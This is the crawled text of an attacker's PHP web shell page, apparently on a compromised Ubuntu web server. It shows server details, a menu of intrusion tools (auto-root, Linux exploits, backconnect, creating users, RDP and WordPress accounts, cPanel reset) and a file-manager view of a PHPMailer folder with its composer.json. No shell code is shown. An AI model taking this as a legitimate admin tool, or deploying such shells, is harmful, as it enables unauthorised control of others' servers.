Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
temppayment /
pg /
fees /
phpmailer /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-xr-x
extras
[ DIR ]
drwxr-xr-x
language
[ DIR ]
drwxr-xr-x
LICENSE
25.8
KB
-rw-r--r--
PHPMailerAutoload.php
1.65
KB
-rw-r--r--
VERSION
7
B
-rw-r--r--
class.phpmailer.php
143.32
KB
-rw-r--r--
class.phpmaileroauth.php
7.05
KB
-rw-r--r--
class.phpmaileroauthgoogle.php
2.41
KB
-rw-r--r--
class.pop3.php
10.75
KB
-rw-r--r--
class.smtp.php
41.07
KB
-rw-r--r--
composer.json
1.14
KB
-rw-r--r--
composer.lock
126.26
KB
-rw-r--r--
get_oauth_token.php
4.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "phpmailer/phpmailer", "type": "library", "description": "PHPMailer is a full-featured email creation and transfer class for PHP", "authors": [ { "name": "Marcus Bointon", "email": "phpmailer@synchromedia.co.uk" }, { "name": "Jim Jagielski", "email": "jimjag@gmail.com" }, { "name": "Andy Prevost", "email": "codeworxtech@users.sourceforge.net" }, { "name": "Brent R. Matzelle" } ], "require": { "php": ">=5.0.0" }, "require-dev": { "phpdocumentor/phpdocumentor": "*", "phpunit/phpunit": "4.7.*" }, "suggest": { "league/oauth2-google": "Needed for Google XOAUTH2 authentication" }, "autoload": { "classmap": [ "class.phpmailer.php", "class.phpmaileroauth.php", "class.phpmaileroauthgoogle.php", "class.smtp.php", "class.pop3.php", "extras/EasyPeasyICS.php", "extras/ntlm_sasl_client.php" ] }, "license": "LGPL-2.1" }
Close